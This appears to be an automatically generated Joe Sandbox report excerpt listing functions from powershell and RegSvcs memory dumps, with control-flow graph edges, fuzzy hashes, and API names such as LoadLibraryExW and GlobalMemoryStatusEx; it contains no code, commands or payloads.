                                                        control_flow_graph 19 7ffb4aef6d23-7ffb4aef6d86 22 7ffb4aef6eb5-7ffb4aef6ec1 19->22 23 7ffb4aef6d8c-7ffb4aef6d96 19->23 32 7ffb4aef6ec2-7ffb4aef6ef4 22->32 24 7ffb4aef6d98-7ffb4aef6da5 23->24 25 7ffb4aef6daf-7ffb4aef6db4 23->25 24->25 35 7ffb4aef6da7-7ffb4aef6dad 24->35 26 7ffb4aef6dba-7ffb4aef6dbd 25->26 27 7ffb4aef6e55-7ffb4aef6e5f 25->27 30 7ffb4aef6dd4-7ffb4aef6dd8 26->30 31 7ffb4aef6dbf-7ffb4aef6dc8 26->31 33 7ffb4aef6e61-7ffb4aef6e6f 27->33 34 7ffb4aef6e70-7ffb4aef6eb2 27->34 30->27 40 7ffb4aef6dda-7ffb4aef6de0 30->40 31->30 45 7ffb4aef6ef6-7ffb4aef6efc 32->45 46 7ffb4aef6f01-7ffb4aef6f1b 32->46 34->22 35->25 43 7ffb4aef6de2-7ffb4aef6def 40->43 44 7ffb4aef6dfc-7ffb4aef6e1e 40->44 43->44 51 7ffb4aef6df1-7ffb4aef6dfa 43->51 58 7ffb4aef6e25-7ffb4aef6e2c 44->58 45->46 46->32 55 7ffb4aef6f1d-7ffb4aef6f23 46->55 51->44 59 7ffb4aef6f25-7ffb4aef6f47 55->59 60 7ffb4aef6f4e-7ffb4aef6f77 55->60 61 7ffb4aef6e32-7ffb4aef6e3a 58->61 59->60 69 7ffb4aef6f79 60->69 70 7ffb4aef6f7e-7ffb4aef6f8f 60->70 62 7ffb4aef6e42-7ffb4aef6e47 61->62 63 7ffb4aef6e3c-7ffb4aef6e40 61->63 66 7ffb4aef6e48-7ffb4aef6e54 62->66 63->66 69->70 71 7ffb4aef6f7b 69->71 72 7ffb4aef6f96-7ffb4aef6fd8 70->72 73 7ffb4aef6f91 70->73 71->70 76 7ffb4aef7049-7ffb4aef704c 72->76 77 7ffb4aef6fda-7ffb4aef7000 72->77 73->72 74 7ffb4aef6f93 73->74 74->72 78 7ffb4aef70e2-7ffb4aef70ec 76->78 79 7ffb4aef7052-7ffb4aef707d 76->79 80 7ffb4aef7002-7ffb4aef7011 77->80 81 7ffb4aef70f9-7ffb4aef7137 78->81 82 7ffb4aef70ee-7ffb4aef70f8 78->82 89 7ffb4aef7024-7ffb4aef7031 79->89 93 7ffb4aef707f-7ffb4aef70ad 79->93 80->80 84 7ffb4aef7013-7ffb4aef7023 80->84 84->89 89->78 92 7ffb4aef7037-7ffb4aef7047 89->92 92->76 93->78
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1630895942.00007FFB4AEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffb4aef0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: H7x[
                                                        • API String ID: 0-1168058201
                                                        • Opcode ID: e1a35273a47e31e15b2f3e424d560d13fbccec22e753720d025d7849cd926a50
                                                        • Instruction ID: 04f751f8803464aba8a31d711b73bd8e45bead2a2aab9ac8ddbf97effcd4d294
                                                        • Opcode Fuzzy Hash: e1a35273a47e31e15b2f3e424d560d13fbccec22e753720d025d7849cd926a50
                                                        • Instruction Fuzzy Hash: 0ED159A2A4EBC95FE396BE3898651747FE5EF4A210B2900FBE05DC71D3D9189C06C391
                                                        Function 00007FFB4AE37E6A Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 99 7ffb4ae37e6a-7ffb4ae384cf 102 7ffb4ae384d1-7ffb4ae384d6 99->102 103 7ffb4ae384d9-7ffb4ae3850b LoadLibraryExW 99->103 102->103 104 7ffb4ae3850d 103->104 105 7ffb4ae38513-7ffb4ae3853a 103->105 104->105
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1630108081.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffb4ae20000_powershell.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 100bf662a170f9837b937108a23d03653d65a237965c21488ce0076ac51ca8b1
                                                        • Instruction ID: d52387bda740feb54639244720358457a445d8eb1238c7bb532b358f40033e87
                                                        • Opcode Fuzzy Hash: 100bf662a170f9837b937108a23d03653d65a237965c21488ce0076ac51ca8b1
                                                        • Instruction Fuzzy Hash: D921A07190CA1C9FDB58EF6CD449BF9BBE0FB69320F10822ED00AD3651DB70A4168B91
                                                        Function 00007FFB4AEF01E9 Relevance: .4, Instructions: 399COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1630895942.00007FFB4AEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffb4aef0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8d4c7e8cb5feb17ebf5a62750c4ce193277dedf81219b86674567796f689e202
                                                        • Instruction ID: 0f107a90e418456d73fe4e008eef05e64d617e2dfbddd3ad97841c6c9742ecad
                                                        • Opcode Fuzzy Hash: 8d4c7e8cb5feb17ebf5a62750c4ce193277dedf81219b86674567796f689e202
                                                        • Instruction Fuzzy Hash: F3B1F69294E7C55FF396BE7888691607FE4EF56210B2940FBE59CCB1D3E81C5C0A8362
                                                        Function 00007FFB4AEF7ECF Relevance: .2, Instructions: 186COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 386 7ffb4aef7ecf-7ffb4aef7ed7 387 7ffb4aef7ed9-7ffb4aef7ee3 386->387 388 7ffb4aef7ef1-7ffb4aef7f07 386->388 389 7ffb4aef7ee9-7ffb4aef7ef0 387->389 390 7ffb4aef7f9e-7ffb4aef7fa9 387->390 391 7ffb4aef7f11-7ffb4aef7f2c 388->391 389->388 393 7ffb4aef7fb1 390->393 394 7ffb4aef7fab 390->394 391->390 395 7ffb4aef7fb5-7ffb4aef8015 393->395 396 7ffb4aef7fb3 393->396 394->393 398 7ffb4aef8017-7ffb4aef8037 395->398 399 7ffb4aef8016 395->399 396->395 400 7ffb4aef803d-7ffb4aef8046 398->400 401 7ffb4aef815c-7ffb4aef8166 398->401 399->398 400->401 403 7ffb4aef8168-7ffb4aef8172 401->403 404 7ffb4aef8173-7ffb4aef81b4 401->404
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1630895942.00007FFB4AEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffb4aef0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 60d1dedfc1353824aee9d5b2b5a08087d971d1c3e8446afe3b7091cda8b70733
                                                        • Instruction ID: c716b3a5de04055bb091c624f53af601494d314d76c5298b1932cad0274e11cd
                                                        • Opcode Fuzzy Hash: 60d1dedfc1353824aee9d5b2b5a08087d971d1c3e8446afe3b7091cda8b70733
                                                        • Instruction Fuzzy Hash: A741376264DB850FD756BF3C8860661BFE0FF56310B2801FBE088C7193DA18AC46C392
                                                        Function 00007FFB4AEF6A83 Relevance: .2, Instructions: 183COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1630895942.00007FFB4AEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffb4aef0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 34f19f584e27a8577529ab0ce10e97f6f35fc1785027a885a4e0022f2f9eab76
                                                        • Instruction ID: 4dbbc16d0c1956c3a27c25f11c54e323387ce89d3664a3c1f540b66c0d1ee186
                                                        • Opcode Fuzzy Hash: 34f19f584e27a8577529ab0ce10e97f6f35fc1785027a885a4e0022f2f9eab76
                                                        • Instruction Fuzzy Hash: 0051E5A2A4DA868FE7A9BE3C981117477D5FF89310B2800FBE06DC7197DD14EC068381
                                                        Function 00007FFB4AD0E540 Relevance: .1, Instructions: 122COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 454 7ffb4ad0e540-7ffb4ad0e579 457 7ffb4ad0e57b-7ffb4ad0e585 454->457 458 7ffb4ad0e58a-7ffb4ad0e58c 454->458 459 7ffb4ad0e58d-7ffb4ad0e5fb 457->459 460 7ffb4ad0e587 457->460 458->459 462 7ffb4ad0e5fd-7ffb4ad0e604 459->462 460->458 463 7ffb4ad0e62b-7ffb4ad0e640 462->463 464 7ffb4ad0e606-7ffb4ad0e61f 462->464 465 7ffb4ad0e623-7ffb4ad0e629 464->465 465->462
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1629446731.00007FFB4AD0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD0D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffb4ad0d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 40eaa14abd4544810a67ef653ab27520a90fdcba625ed316d0035711b5eafc7e
                                                        • Instruction ID: c8edee542ab845f9f99b648f10b51b5a140cb8550183be42a92c6315f81145bd
                                                        • Opcode Fuzzy Hash: 40eaa14abd4544810a67ef653ab27520a90fdcba625ed316d0035711b5eafc7e
                                                        • Instruction Fuzzy Hash: FA4123B040DBC44FE75A9F38D8459523FF0EF52224B1905DFD088CB1A3DA25E80AC792
                                                        Function 00007FFB4AEF6ACF Relevance: .1, Instructions: 96COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1630895942.00007FFB4AEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffb4aef0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ce3113d4889382b389c8e55643e5865a70ddea071c5aba5bd82a04e24b252451
                                                        • Instruction ID: 88c913f37a0883bd35ea52ae65062120385bcc7a03d204831d47050a6d470b03
                                                        • Opcode Fuzzy Hash: ce3113d4889382b389c8e55643e5865a70ddea071c5aba5bd82a04e24b252451
                                                        • Instruction Fuzzy Hash: 3321F5A2A4EA879FE7A9BE38C95117466D5FF58310B7900FAE06DC3193DD18EC058341
                                                        Function 00007FFB4AEF2A48 Relevance: .1, Instructions: 78COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 520 7ffb4aef2a48-7ffb4aef2a80 524 7ffb4aef2a82-7ffb4aef2a8c 520->524 525 7ffb4aef2adf-7ffb4aef2b74 520->525 526 7ffb4aef2aa5-7ffb4aef2aa8 524->526 527 7ffb4aef2a8e-7ffb4aef2a9e 524->527 539 7ffb4aef2b7a-7ffb4aef2b84 525->539 540 7ffb4aef2dfb-7ffb4aef2eba 525->540 526->525 530 7ffb4aef2aaa-7ffb4aef2ab1 526->530 532 7ffb4aef2ab2-7ffb4aef2ab4 527->532 533 7ffb4aef2aa0-7ffb4aef2aa3 527->533 530->532 534 7ffb4aef2aca-7ffb4aef2ace 532->534 535 7ffb4aef2ab6-7ffb4aef2ac7 532->535 533->526 541 7ffb4aef2ad5-7ffb4aef2ade 534->541 535->534 542 7ffb4aef2b86-7ffb4aef2b93 539->542 543 7ffb4aef2b9d-7ffb4aef2ba2 539->543 542->543 548 7ffb4aef2b95-7ffb4aef2b9b 542->548 546 7ffb4aef2ba8-7ffb4aef2bab 543->546 547 7ffb4aef2d9f-7ffb4aef2da9 543->547 549 7ffb4aef2bc2 546->549 550 7ffb4aef2bad-7ffb4aef2bc0 546->550 551 7ffb4aef2db8-7ffb4aef2df8 547->551 552 7ffb4aef2dab-7ffb4aef2db7 547->552 548->543 556 7ffb4aef2bc4-7ffb4aef2bc6 549->556 550->556 551->540 556->547 558 7ffb4aef2bcc-7ffb4aef2c00 556->558 570 7ffb4aef2c17 558->570 571 7ffb4aef2c02-7ffb4aef2c15 558->571 574 7ffb4aef2c19-7ffb4aef2c1b 570->574 571->574 574->547 575 7ffb4aef2c21-7ffb4aef2c29 574->575 575->540 577 7ffb4aef2c2f-7ffb4aef2c39 575->577 578 7ffb4aef2c55-7ffb4aef2c65 577->578 579 7ffb4aef2c3b-7ffb4aef2c53 577->579 578->547 582 7ffb4aef2c6b-7ffb4aef2c9c 578->582 579->578 582->547 589 7ffb4aef2ca2-7ffb4aef2cce 582->589 594 7ffb4aef2cf9 589->594 595 7ffb4aef2cd0-7ffb4aef2cf7 589->595 596 7ffb4aef2cfb-7ffb4aef2cfd 594->596 595->596 596->547 598 7ffb4aef2d03-7ffb4aef2d0a 596->598 599 7ffb4aef2d0c-7ffb4aef2d3d 598->599 604 7ffb4aef2d56-7ffb4aef2d64 599->604 605 7ffb4aef2d3f-7ffb4aef2d54 599->605 608 7ffb4aef2d66-7ffb4aef2d9e 604->608 609 7ffb4aef2d0b 604->609 605->604 609->599
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1630895942.00007FFB4AEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffb4aef0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a0b9e6a73550b1cb41dff17fcfd19bcf67bd5297bf76d43d44df669a04269bbd
                                                        • Instruction ID: ca967fa7b38d1a5143fcd082906d3c47320787d73a4f8fff5ad39cfbe5f540f5
                                                        • Opcode Fuzzy Hash: a0b9e6a73550b1cb41dff17fcfd19bcf67bd5297bf76d43d44df669a04269bbd
                                                        • Instruction Fuzzy Hash: 88112982A4CE860FE3B5BEBD88942352BD5FF55310BB801B7E45CCB187DA14DC414251
                                                        Function 00007FFB4AEF6DCC Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1630895942.00007FFB4AEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffb4aef0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4f4a0873d224dfb36fc5bbfd1da7bab5db77e9f512becb295248f5b0d24b0b5d
                                                        • Instruction ID: 2eee9cb52051fbc498dfc24d9c9af51b639d9f6cdb9222abbc34f8ce4c6b8333
                                                        • Opcode Fuzzy Hash: 4f4a0873d224dfb36fc5bbfd1da7bab5db77e9f512becb295248f5b0d24b0b5d
                                                        • Instruction Fuzzy Hash: 2E11C1B394E5859FE7A5FF28D5815747AE4FF0831072500FAF06DC7196D919AC118281

                                                        Non-executed Functions

                                                        Function 00007FFB4AE342DA Relevance: 18.5, Strings: 14, Instructions: 1007COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1630108081.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffb4ae20000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 9x[$(9x[$08x[$88x[$@8x[$H8x[$P8x[$X8x[$`8x[$h8x[$p8x[$x8x[$8x[$8x[
                                                        • API String ID: 0-3632575193
                                                        • Opcode ID: 43b4634bc5ead2e884983ae6582dc8bb26acbfe5573b6ca88fd67ea19b8ea547
                                                        • Instruction ID: a7dca04a154568e552fb3c39dc0bfb9fc6406ffddd5815d5bc82f1eb0b9b494d
                                                        • Opcode Fuzzy Hash: 43b4634bc5ead2e884983ae6582dc8bb26acbfe5573b6ca88fd67ea19b8ea547
                                                        • Instruction Fuzzy Hash: 7A8230B0A08A498FEB95FF6CD088FA977E1EF65301F2505B5E41DDB292DA74E885C700
                                                        Function 00007FFB4AE31438 Relevance: 2.9, Strings: 2, Instructions: 382COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1630108081.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffb4ae20000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: /L_^${.L
                                                        • API String ID: 0-2592374012
                                                        • Opcode ID: 8bf7434fbc3a23e79ac45036a68a779980bdbe9c1543e686cce4cc9e709ed2c5
                                                        • Instruction ID: f7260e2c4c737543f9ee71f2803e60c1a67059d02049a22c6320a6f52bdc5f05
                                                        • Opcode Fuzzy Hash: 8bf7434fbc3a23e79ac45036a68a779980bdbe9c1543e686cce4cc9e709ed2c5
                                                        • Instruction Fuzzy Hash: B1A15BE3B0962285D5027BFDF8420FCB308EF81376B1481B7DB4D9A0474E5A61AB52F6
                                                        Function 00007FFB4AE309F2 Relevance: 2.2, Strings: 1, Instructions: 972COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1630108081.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffb4ae20000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: :L_^
                                                        • API String ID: 0-1990364693
                                                        • Opcode ID: f66ac93df59a4a955cfaf30a45740119762ba39b6cc97ddcebb316d7f61682d3
                                                        • Instruction ID: 5033722c26f39a3e1db6f9bbb1dfdeacf8076608d74523156489fe84688ed595
                                                        • Opcode Fuzzy Hash: f66ac93df59a4a955cfaf30a45740119762ba39b6cc97ddcebb316d7f61682d3
                                                        • Instruction Fuzzy Hash: 1E5203B1A0CA194BE759BF3CD8456F877D9FF98310F2401BAE44DC7297DE28A8428791
                                                        Function 00007FFB4AEF341A Relevance: .2, Instructions: 212COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1630895942.00007FFB4AEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffb4aef0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eba36d87f694c44e9d7acc7e10de7e09b1366f3a5aca40959bf8bceef098dd0b
                                                        • Instruction ID: 51b0c61b62e52b3345f1bd655d58d000e79a5e68421c191dbe4cece93fc2b118
                                                        • Opcode Fuzzy Hash: eba36d87f694c44e9d7acc7e10de7e09b1366f3a5aca40959bf8bceef098dd0b
                                                        • Instruction Fuzzy Hash: 6961E48154E7C21FE353BB7899691A17FE5EF53210B2A41FBD4A8CB1E3D90D9806C362
                                                        Function 00007FFB4AEF3462 Relevance: .1, Instructions: 139COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1630895942.00007FFB4AEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffb4aef0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8bb52e42b6756bff261691325c03a2372d96781df4a5cb260390f08257c5d052
                                                        • Instruction ID: e33b1663426ce593d2fca879f930bca74395e580ae3d08602eeadde3c868488f
                                                        • Opcode Fuzzy Hash: 8bb52e42b6756bff261691325c03a2372d96781df4a5cb260390f08257c5d052
                                                        • Instruction Fuzzy Hash: 6C41798144F7C21FE353ABB899691927FF5AF63120B1E41EBD4D4CB0A3D509890AD322

                                                        Execution Graph

                                                        Execution Coverage:14.6%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:51
                                                        Total number of Limit Nodes:7
                                                        execution_graph 11437 cf18e0 11438 cf18e4 11437->11438 11442 cf1a61 11438->11442 11447 cf1b78 11438->11447 11452 cf1be1 11438->11452 11444 cf1a9c 11442->11444 11443 cf1b76 11443->11438 11444->11443 11457 cf200b 11444->11457 11461 cf2018 11444->11461 11448 cf1b4f 11447->11448 11449 cf1b76 11448->11449 11450 cf200b 3 API calls 11448->11450 11451 cf2018 3 API calls 11448->11451 11449->11438 11450->11448 11451->11448 11454 cf1b4f 11452->11454 11453 cf1b76 11453->11438 11454->11453 11455 cf200b 3 API calls 11454->11455 11456 cf2018 3 API calls 11454->11456 11455->11454 11456->11454 11458 cf203d 11457->11458 11465 cf2be8 11458->11465 11459 cf211e 11462 cf203d 11461->11462 11464 cf2be8 3 API calls 11462->11464 11463 cf211e 11463->11463 11464->11463 11467 cf2bed 11465->11467 11466 cf2d5d 11466->11459 11467->11466 11470 cf79f0 11467->11470 11474 cf7a00 11467->11474 11471 cf7a25 11470->11471 11478 cf7c98 11471->11478 11472 cf7a87 11472->11466 11475 cf7a25 11474->11475 11477 cf7c98 3 API calls 11475->11477 11476 cf7a87 11476->11466 11477->11476 11482 cf80d1 11478->11482 11490 cf80e0 11478->11490 11479 cf7cb6 11479->11472 11483 cf8115 11482->11483 11484 cf80ed 11482->11484 11498 cf7cd0 11483->11498 11484->11479 11486 cf8136 11486->11479 11488 cf81fe GlobalMemoryStatusEx 11489 cf822e 11488->11489 11489->11479 11491 cf80ed 11490->11491 11492 cf8115 11490->11492 11491->11479 11493 cf7cd0 GlobalMemoryStatusEx 11492->11493 11495 cf8132 11493->11495 11494 cf8136 11494->11479 11495->11494 11496 cf81fe GlobalMemoryStatusEx 11495->11496 11497 cf822e 11496->11497 11497->11479 11499 cf81b8 GlobalMemoryStatusEx 11498->11499 11501 cf8132 11499->11501 11501->11486 11501->11488

                                                        Executed Functions

                                                        Function 00CF80E0 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 118 cf80e0-cf80eb 119 cf80ed-cf8114 call cf7354 118->119 120 cf8115-cf8134 call cf7cd0 118->120 126 cf813a-cf8199 120->126 127 cf8136-cf8139 120->127 134 cf819f-cf822c GlobalMemoryStatusEx 126->134 135 cf819b-cf819e 126->135 140 cf822e-cf8234 134->140 141 cf8235-cf825d 134->141 140->141
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3868042235.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_cf0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e76920fdecda5d48aaf4af702df66a871452ad5c162e50428bc917b9b9345c70
                                                        • Instruction ID: cb44055df79099a6875cdde5423b21f1d5ab0f4a988e76129917fff3be3fccf5
                                                        • Opcode Fuzzy Hash: e76920fdecda5d48aaf4af702df66a871452ad5c162e50428bc917b9b9345c70
                                                        • Instruction Fuzzy Hash: E2414631E047499FDB04DFB9D8007AEBBF4EF89310F15866AD508A7291DB789846CBD1
                                                        Function 00CF7CD0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 144 cf7cd0-cf822c GlobalMemoryStatusEx 148 cf822e-cf8234 144->148 149 cf8235-cf825d 144->149 148->149
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00CF8132), ref: 00CF821F
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3868042235.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_cf0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        • Opcode ID: 8912dae8ad873431b7ff553482ec15c099a2c67c6906dcb0ffc93a645c1269a7
                                                        • Instruction ID: fd0ee710ccb54e31af8ce105b27d16baba19eec8ce76cc7a11cfdfe5a99ca922
                                                        • Opcode Fuzzy Hash: 8912dae8ad873431b7ff553482ec15c099a2c67c6906dcb0ffc93a645c1269a7
                                                        • Instruction Fuzzy Hash: DB1100B1C0065A9BDB10DF9AC444BAEFBF4EB48720F10816AE918A7240D778A954CFA5
                                                        Function 00CF81B0 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 152 cf81b0-cf81b4 153 cf81b6-cf81be 152->153 154 cf81c1-cf81f6 152->154 153->154 155 cf81fe-cf822c GlobalMemoryStatusEx 154->155 156 cf822e-cf8234 155->156 157 cf8235-cf825d 155->157 156->157
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00CF8132), ref: 00CF821F
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3868042235.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_cf0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        • Opcode ID: 24100affa78fe878af5532676c5eb3a50e2aa4e967471068c99fa9dda103584d
                                                        • Instruction ID: 30a1163e1d96ec43250e4a6c7fe36f83bc0cb853525ca7fb4514dc61e9d270ef
                                                        • Opcode Fuzzy Hash: 24100affa78fe878af5532676c5eb3a50e2aa4e967471068c99fa9dda103584d
                                                        • Instruction Fuzzy Hash: 111112B5C0065A9BDB10DF9AD5447EEFBF4BF48320F24812AD918B7240D778AA45CFA1
                                                        Function 00A8D400 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3865834434.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_a8d000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 11eace37cd971ff9b47271421c20f0cf44f5d201212e259afb08a60194d1122c
                                                        • Instruction ID: b0e29ea6624f800948683e7267922909e815bdd1a3a4009593f4e9de56ed5b1a
                                                        • Opcode Fuzzy Hash: 11eace37cd971ff9b47271421c20f0cf44f5d201212e259afb08a60194d1122c
                                                        • Instruction Fuzzy Hash: 72212575504304DFDB04EF10D9C4B16BF65FB98324F20C56DE8090B296C336E856CBA2
                                                        Function 00A8D3FB Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3865834434.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_a8d000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                        • Instruction ID: 2858db2547d6431c166a982bdd6bf1af6821c9d6082f1ec3e7c51aad5ec96187
                                                        • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                        • Instruction Fuzzy Hash: 1311D376504244CFCB15DF10D5C4B16BF72FB94324F24C5A9DC494B696C33AE856CBA1